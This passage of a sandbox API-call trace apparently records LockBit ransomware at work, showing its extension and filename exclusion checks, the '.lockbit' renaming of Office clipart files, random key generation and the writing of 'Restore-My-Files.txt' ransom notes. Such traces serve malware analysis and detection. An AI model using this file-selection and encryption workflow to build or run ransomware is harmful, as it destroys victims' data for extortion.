(lpString1=".idx", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00390_.WMF") returned -1 [0175.269] lstrcmpiW (lpString1="ntldr", lpString2="SO00390_.WMF") returned -1 [0175.269] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00390_.WMF") returned -1 [0175.269] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00390_.WMF") returned -1 [0175.269] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00390_.WMF") returned -1 [0175.269] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00390_.WMF") returned 1 [0175.269] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00390_.WMF") returned -1 [0175.269] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.269] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00390_.WMF") returned=".WMF" [0175.270] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.270] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.270] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.271] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.271] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.271] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.271] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.271] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.271] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.271] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.271] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00390_.WMF.lockbit") returned 72 [0175.271] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00390_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0175.272] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.272] malloc (_Size=0x40068) returned 0x3fb00b8 [0175.273] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3fb00d0 | out: lpFileSize=0x3fb00d0*=2940) returned 1 [0175.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.274] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00ec) returned 0x0 [0175.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00fc) returned 0x0 [0175.275] ReadFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 0x0 [0175.281] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00390_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00390_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.281] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.281] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.282] free (_Block=0x1fa2ed8) [0175.282] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00390_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.282] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.282] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.283] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22c49b00, ftCreationTime.dwHighDateTime=0x1bd4b32, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22c49b00, ftLastWriteTime.dwHighDateTime=0x1bd4b32, nFileSizeHigh=0x0, nFileSizeLow=0x828, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00391_.WMF", cAlternateFileName="")) returned 1 [0175.283] lstrcmpiW (lpString1=".", lpString2="SO00391_.WMF") returned -1 [0175.283] lstrcmpiW (lpString1="..", lpString2="SO00391_.WMF") returned -1 [0175.283] PathFindExtensionW (pszPath="SO00391_.WMF") returned=".WMF" [0175.283] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.283] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.283] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.283] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.283] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.283] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.283] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.283] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.283] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.283] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.283] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.284] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.285] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.285] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.286] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.286] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.286] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.286] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00391_.WMF") returned -1 [0175.286] lstrcmpiW (lpString1="ntldr", lpString2="SO00391_.WMF") returned -1 [0175.286] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00391_.WMF") returned -1 [0175.286] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00391_.WMF") returned -1 [0175.286] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00391_.WMF") returned -1 [0175.286] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00391_.WMF") returned 1 [0175.286] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00391_.WMF") returned -1 [0175.286] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.286] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00391_.WMF") returned=".WMF" [0175.286] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.286] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.286] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.286] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.286] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.287] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.288] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.288] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.288] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.288] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.288] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.288] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00391_.WMF.lockbit") returned 72 [0175.288] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00391_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00391_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.300] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.300] malloc (_Size=0x40068) returned 0x3f70048 [0175.300] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=2088) returned 1 [0175.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0175.301] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0175.301] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0175.304] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00391_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00391_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.304] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.304] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.305] free (_Block=0x1fa2ed8) [0175.305] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00391_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.305] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.306] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.306] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59e57d00, ftCreationTime.dwHighDateTime=0x1bd4b2f, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x59e57d00, ftLastWriteTime.dwHighDateTime=0x1bd4b2f, nFileSizeHigh=0x0, nFileSizeLow=0x704e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00416_.WMF", cAlternateFileName="")) returned 1 [0175.306] lstrcmpiW (lpString1=".", lpString2="SO00416_.WMF") returned -1 [0175.306] lstrcmpiW (lpString1="..", lpString2="SO00416_.WMF") returned -1 [0175.306] PathFindExtensionW (pszPath="SO00416_.WMF") returned=".WMF" [0175.306] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.306] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.306] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.306] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.306] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.306] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.306] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.306] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.306] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.306] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.306] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.306] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.306] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.307] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.307] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.308] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00416_.WMF") returned -1 [0175.308] lstrcmpiW (lpString1="ntldr", lpString2="SO00416_.WMF") returned -1 [0175.308] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00416_.WMF") returned -1 [0175.308] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00416_.WMF") returned -1 [0175.308] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00416_.WMF") returned -1 [0175.308] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00416_.WMF") returned 1 [0175.308] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00416_.WMF") returned -1 [0175.309] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.309] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00416_.WMF") returned=".WMF" [0175.309] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.309] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.309] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.310] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.310] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.310] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.310] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.310] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.310] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.310] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.310] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.310] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.310] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.310] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00416_.WMF.lockbit") returned 72 [0175.310] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00416_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00416_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0175.311] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.312] malloc (_Size=0x40068) returned 0x3d70450 [0175.312] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=28750) returned 1 [0175.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0175.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.313] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0175.313] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0175.332] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00416_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00416_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.332] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.332] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0175.332] free (_Block=0x1fa2ed8) [0175.333] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00416_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.333] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.333] CreateFileW 